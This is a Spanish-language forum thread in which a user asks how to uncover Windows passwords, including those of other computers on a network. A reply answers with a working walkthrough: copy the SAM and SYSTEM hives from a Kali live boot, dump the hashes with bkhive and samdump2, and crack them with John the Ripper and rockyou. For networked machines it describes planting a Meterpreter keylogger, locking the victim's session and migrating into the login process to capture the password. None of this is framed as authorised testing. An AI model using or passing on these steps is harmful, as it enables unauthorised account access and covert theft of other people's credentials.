Como descifró contraseña de sistemas operativo windows, no me interesa quitarla lo que me interesa es descubrir la contraseña también descifrar las contraseñas de computadoras windows que estén en red y inicien en red.
Nitro_x_net.
Gracias y saludos de antemano.
Enviado desde mi XT1032 mediante Tapatalk
Si tienes acceso fisico a la maquina lo puedes hacer iniciando Kali en la misma. Aca te doy una forma sencilla:
1. Montas la particion del sistema:
mount /dev/sda1 /mnt
2. Copias el SAM y el SYSTEM
cp /mnt/Windows/System32/config/SAM /tmp
cp /mnt/Windows/System32/config/SYSTEM /tmp
3. Te pasas a /tmp para trabajar mas comodo
cd /tmp
4. Generas las llaves del sistema y de booteo
bkhive SYSTEM hive
5. Generas los hashes
samdump2 SAM hive > hashes.txt
6. Descomprimes un diccionario:
cp /usr/share/wordlists/rockyou.txt.gz /tmp
gunzip /tmp/rockyou.txt.gz
6. Descifras el password con el john
john --format=nt -w=rockyou.txt hashes.txt
Otra opcion seria bajarte la tabla de Vista para Ophcrack y usar el mismo, aunque yo lo noto mucho mas lento que el john...ironicamente, porque se supone que el Ophcrack sea mas rapido porque no cifra cada password sino que compara los hashes directamente.
Para las maquinas en la red lo haces desde el meterpreter, si el password esta muy dificil de descifrar puedes iniciarle un keylogger desde el meterpreter, luego le bloqueas la session con rundll32 user32 LockWorkStation y migras hacia el proceso de login para capturar el password.
De forma más cómoda, puedes usar un live cd llamado OPHCrack el cual a través de tablas rainbows, intenta crackear la clave.
Saludos y suerte.